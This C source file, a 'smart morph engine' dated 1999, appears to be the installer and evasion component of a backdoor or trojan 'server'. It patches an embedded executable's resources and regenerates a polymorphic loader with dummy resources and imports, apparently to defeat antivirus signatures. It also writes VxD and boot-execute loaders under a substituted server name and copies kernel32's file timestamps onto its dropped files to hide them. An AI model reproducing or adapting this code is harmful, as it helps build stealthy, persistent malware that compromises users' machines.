/*
  smart morph engine - high level procedures
  written by alexander yaworsky
  september '99
*/

//#define TEST

#include <windows.h>

#include "filetime.h"
#include "paths.h"
#include "resource.h"
#include "registry.h"
#include "sm.h"
#include "stdlib.h"
#include "stringlist.h"
#include "syslog.h"
#include "switches.h"


static void* GetResourcePtr( BYTE* p, BOOL IsFile,
                             int ResType, int ResId, DWORD* ResourceSize )
  {
    IMAGE_OPTIONAL_HEADER     *oh;
    IMAGE_SECTION_HEADER      *sh;
    IMAGE_RESOURCE_DIRECTORY  *rd;
    IMAGE_RESOURCE_DIRECTORY_ENTRY   *rde;
    IMAGE_RESOURCE_DATA_ENTRY        *rdata;
    DWORD  raddr, rsize, scount, i, rsrcVA;
    BYTE   *rsec, *RetVal;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif


    // get optional header ptr

    oh = (IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( p );
    raddr = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].VirtualAddress;
    rsrcVA = raddr;
    rsize = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].Size;

    if( IsFile ) {

      // scanning sections for resources and set correct raddr

      scount = ((IMAGE_FILE_HEADER*) PEFHDROFFSET( p ))->NumberOfSections;
      sh = (IMAGE_SECTION_HEADER*) SECHDROFFSET( p );
      for( i = 0; i < scount; i++, sh++ ) {
        if( raddr >= sh->VirtualAddress &&
            raddr < sh->VirtualAddress + sh->SizeOfRawData ) {
          raddr = sh->PointerToRawData;
#         ifdef TEST
            wsprintf( DbgMsg, "GetResourcePtr: scan - rsrc section at %08X\r\n", sh->PointerToRawData );
            DbgOut();
#         endif
          break;
        }
      }
      if( i >= scount ) raddr = 0;
    }
    if( raddr == 0 || rsize == 0 ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: rsrc section not found\r\n" );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource section addr 0x%X, size 0x%X\r\n", raddr, rsize );
      DbgOut();
#   endif

    rsec = p + raddr;

    // scan root level of resource tree for type

    rd = (IMAGE_RESOURCE_DIRECTORY*) rsec;
    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
    for( rsize = 0; rsize < rd->NumberOfIdEntries; rsize++, rde++ ) {
      if( ResType == rde->NameOffset ) break;
    }
    if( rsize >= rd->NumberOfIdEntries ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource type %d not found\r\n", ResType );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

    // rde is now pointer to appropriate type entry

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: directory for resource type %d is located at %08X\r\n", ResType, rde->OffsetToDirectory );
      DbgOut();
#   endif

    if( ! rde->DataIsDirectory ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: invalid directory entry for resource type %d\r\n", ResType );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }
    rd = (IMAGE_RESOURCE_DIRECTORY*) (rsec + rde->OffsetToDirectory);

    // scan second level of resource tree for id

    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
    for( rsize = 0; rsize < rd->NumberOfIdEntries; rsize++, rde++ ) {
      if( ResId == rde->NameOffset ) break;
    }
    if( rsize >= rd->NumberOfIdEntries ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource id %d not found\r\n", ResId );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

    // rde is now pointer to appropriate id entry

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: directory for resource id %d is located at %08X\r\n", ResId, rde->OffsetToDirectory );
      DbgOut();
#   endif

    if( rde->DataIsDirectory ) {

      // if entry doesn't points to resource data immediately,
      // get resource data from the third level of resource tree

      rd = (IMAGE_RESOURCE_DIRECTORY*) (rsec + rde->OffsetToDirectory);
      rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
      if( rd->NumberOfIdEntries < 1 ) {
#       ifdef TEST
          wsprintf( DbgMsg, "GetResourcePtr: resource %d %d is empty\r\n", ResType, ResId );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
    }

    // here rde is the pointer to resource data entry

    if( rde->DataIsDirectory ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource data is expected\r\n" );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource data entry is located at %08X\r\n", rde->OffsetToDirectory );
      DbgOut();
#   endif
    rdata = (IMAGE_RESOURCE_DATA_ENTRY*) (rsec + rde->OffsetToDirectory);
    if( ResourceSize != NULL ) *ResourceSize = rdata->Size;
#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource %d %d is at %08X\r\n", ResType, ResId, rdata->OffsetToData );
      DbgOut();
#   endif

    if( IsFile ) RetVal = rsec + (rdata->OffsetToData - rsrcVA);
    else RetVal = p + rdata->OffsetToData;

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: will be returned for %d, %d: %08X, %d (rsrc VA %X)\r\n",
                ResId, ResType, (DWORD) RetVal, *ResourceSize, rsrcVA );
      DbgOut();
      DbgDestroyOutput();
#   endif

    return (void*) RetVal;
  }


static void PatchExeImage( BYTE* ExeImage, char* FNames, BYTE* Cfg, DWORD CfgSz )
  {
    BYTE*  p;
    DWORD  s;

    if( FNames != NULL ) {
      p = GetResourcePtr( ExeImage, TRUE, RT_FILE, IDF_PATHS, &s );
      if( p != NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "PatchExeImage: copying paths\r\n" );
          DbgOut();
#       endif
        lstrcpy( p, FNames );
      }
    }
    if( Cfg != NULL && CfgSz != 0 ) {
      p = GetResourcePtr( ExeImage, TRUE, RT_FILE, IDF_SETTINGS, &s );
      if( p != NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "PatchExeImage: copying settings\r\n" );
          DbgOut();
#       endif
        CopyMemory( p, Cfg, CfgSz );
      }
    }
  }



/*****************************************************************************
  Morphs itself into new file;
  Fh is the handle of destination file
*/

BOOL SM_MorphServer( HANDLE Fh, DWORD ResId, char* FNames,
                     BYTE* Cfg, DWORD CfgSz )
  {
    void    *ExeImage, *LoaderImage;
    DWORD   ExeImageSize, LoaderImageSize;
    BOOL    Rc;
    LOADERDATA*  LoaderData;
    EXEDEF*      ExeDef;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif

    Rc = FALSE;
    Srand( GetTickCount() );
    ExeImage = GetExecutableImage( &ExeImageSize, ResId );
    if( ExeImage != NULL ) {

      PatchExeImage( ExeImage, FNames, Cfg, CfgSz );

      /*
        we have our executable source;
        get original loader attached to the executable
      */
      LoaderImage = SM_GetResource( RT_FILE, IDF_SMLOADER, &LoaderImageSize );
      if( LoaderImage == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "SM_LoadResource failed\r\n" );
          DbgOut();
#       endif
      }
      else {
        /*
          we have the pointer to the original loader
          read its data and code into convenient structure
        */ 
        LoaderData = GetLoaderData( LoaderImage );
        if( LoaderData != NULL ) {
          /*
            Generate main structure of new executable file - size of loader,
            size of attached executable, another dummy resources,
            dummy imports, and so on.
          */
          ExeDef = DefineNewExe( LoaderData, ExeImage );
          if( ExeDef != NULL ) {
            /*
              Now generate loader
            */
            GenerateLoaderCode( ExeDef, LoaderData );
            /*
              Finally, link executable file
            */
            Rc = LinkNewExe( Fh, ExeDef, ExeImage );
            LocalFree( ExeDef );
          }
          LocalFree( LoaderData );
        }
      }
      LocalFree( ExeImage );
    }

#   ifdef TEST
      DbgDestroyOutput();
#   endif

    return Rc;
  }


/*****************************************************************************
  Get pointer to the resource data (also returns resource size)
  attached to the currently executing image. This means, if
  image was loaded by loader, it does not uses api functions
*/

void* SM_GetResource( int ResType, int ResId, DWORD* ResourceSize )
  {
    BYTE     *p;
    HRSRC    Rh;
    DWORD    s;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif

    // get image base address

    p = (BYTE*) GetModuleHandle( NULL );
    if( p == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "SM_GetResource: GetModuleHandle( NULL ) returned NULL, last error = %d (0x%08X)\r\n",
                GetLastError(), GetLastError() );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "SM_GetResource: current image base address 0x%08X\r\n", (DWORD) p );
      DbgOut();
#   endif

    // get entry point

    p += ((IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( p ))->AddressOfEntryPoint;

    // check loader's signature

    if( *((DWORD*) p) != 0x5A5A5A5A ) {


      // we are operating as regular program so use api functions

#     ifdef TEST
        wsprintf( DbgMsg, "SM_GetResource: using API\r\n" );
        DbgOut();
#     endif

      Rh = FindResource( NULL, MAKEINTRESOURCE( ResId ),
                               MAKEINTRESOURCE( ResType ) );
      if( Rh == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "SM_GetResource: FindResource( NULL, %d, %d ) returned NULL, last error = %d (0x%08X)\r\n",
                    ResId, ResType, GetLastError(), GetLastError() );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
      p = (BYTE*) LoadResource( NULL, Rh );
      if( p == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "SM_GetResource: LoadResource returned NULL, last error = %d (0x%08X)\r\n",
                    GetLastError(), GetLastError() );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
      s = SizeofResource( NULL, Rh );
      if( ResourceSize != NULL ) *ResourceSize = s;

#     ifdef TEST
        wsprintf( DbgMsg, "SM_GetResource: will be returned for %d, %d: %08X, %d\r\n",
                  ResId, ResType, (DWORD) p, s );
        DbgOut();
        DbgDestroyOutput();
#     endif

      return (void*) p;
    }


    // we are operating under loader, get real base image address

    p = (BYTE*) ( *(((DWORD*) p) + 4) );

#   ifdef TEST
      wsprintf( DbgMsg, "SM_GetResource: real image base address 0x%08X\r\n", (DWORD) p );
      DbgOut();
      DbgDestroyOutput();
#   endif

    return GetResourcePtr( p, FALSE, ResType, ResId, ResourceSize );
  }

//********* SM_ExtractVxD/Bootexec - simply patch loader *******************


static BYTE* GetLoader( DWORD ResId, DWORD* Sz )
  {
    BYTE   *ResPtr, *Buf;

    ResPtr = SM_GetResource( RT_FILE, ResId, Sz );
    if( ResPtr == NULL ) return NULL;
    Buf = LocalAlloc( LMEM_FIXED, *Sz );
    if( Buf == NULL ) {
      SysLog( "SM_ExtractVxD/Bootexec: out of memory" );
      return FALSE;
    }
    CopyMemory( Buf, ResPtr, *Sz );
    return Buf;
  }

static BOOL SubstOleproc( BYTE* Buf, DWORD BufSz,
                          BYTE* OriginalName, DWORD OriginalNameSz,
                          BYTE* NewName, DWORD NewNameSz )
  {
    DWORD  i, j;

    j = BufSz - OriginalNameSz;
    for( i = 0; i < j; i++ )
      if( Buf[ i ] == OriginalName[ 0 ] )
        if( Memcmp( Buf + i, OriginalName, OriginalNameSz ) == 0 ) {
          CopyMemory( Buf + i, NewName, NewNameSz );
          if( NewNameSz < OriginalNameSz )
            for( j = NewNameSz; j < OriginalNameSz; j++ ) Buf[ i + j ] = 0;
          return TRUE;
        }
    SysLog( "Cannot patch loader" );
    return FALSE;
  }

static BOOL WriteLoader( char* FileName, BYTE* Buf, DWORD BufSz )
  {
    SYSTEMTIME      Stm;
    HANDLE          Fh;
    char            K32Path[ MAX_PATH ];
    BOOL   Rc;
    DWORD  s;

    Fh = CreateFile( FileName, GENERIC_READ | GENERIC_WRITE,
                     0, NULL, OPEN_ALWAYS, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) {
      SysLog( "SM_ExtractVxD/Bootexec: CreateFile( %s ) failed, error %d",
              FileName, GetLastError() );
      return FALSE;
    }
    SetEndOfFile( Fh );
    Rc = WriteFile( Fh, Buf, BufSz, &s, NULL );
    CloseHandle( Fh );
    if( Rc == FALSE || s != BufSz ) {
      SysLog( "ExtractFileFromResource: WriteFile failed, error %d", GetLastError() );
      DeleteFile( FileName );
      Rc = FALSE;
    }
    else {
      GetKernel32Path( K32Path );
      GetLocalFileTime( K32Path, &Stm );
      SetLocalFileTime( FileName, &Stm );
      Rc = TRUE;
    }
    return Rc;
  }

BOOL SM_ExtractBootexec( char* FileName, char* SrvName, DWORD ResId )
  {
    BYTE   *Buf;
    DWORD  Sz, i, j;
    char   Name[32];
    char   Oleproc[] = {'o',0,'l',0,'e',0,'p',0,'r',0,'o',0,'c',0,'.',0,
                        'e',0,'x',0,'e',0,0,0};
    BOOL   Rc;

    RtlZeroMemory( Name, sizeof( Name ) );
    j = lstrlen( SrvName );
    if( j > 12 ) {
      SysLog( "SM_ExtractBootexec: server name too long" );
      return FALSE;
    }
    for( i = 0; i < j; i++ ) Name[ i * 2 ] = SrvName[ i ];
    Buf = GetLoader( ResId, &Sz );
    if( Buf == NULL ) return FALSE;
    Rc = FALSE;
    if( SubstOleproc( Buf, Sz, Oleproc, sizeof( Oleproc ), Name, j * 2 + 2 ) )
      if( WriteLoader( FileName, Buf, Sz ) ) Rc = TRUE;
    LocalFree( Buf );
    return Rc;
  }

BOOL SM_ExtractVxD( char* FileName, char* SrvName, DWORD ResId )
  {
    BYTE   *Buf;
    DWORD  Sz, j;
    char   Oleproc[] = "oleproc.exe";
    BOOL   Rc;

    j = lstrlen( SrvName );
    if( j > 12 ) {
      SysLog( "SM_ExtractVxD: server name too long" );
      return FALSE;
    }
    Buf = GetLoader( ResId, &Sz );
    if( Buf == NULL ) return FALSE;
    Rc = FALSE;
    if( SubstOleproc( Buf, Sz, Oleproc, lstrlen( Oleproc ) + 1,
                      SrvName, j + 1 ) )
      if( WriteLoader( FileName, Buf, Sz ) ) Rc = TRUE;
    LocalFree( Buf );
    return Rc;
  }
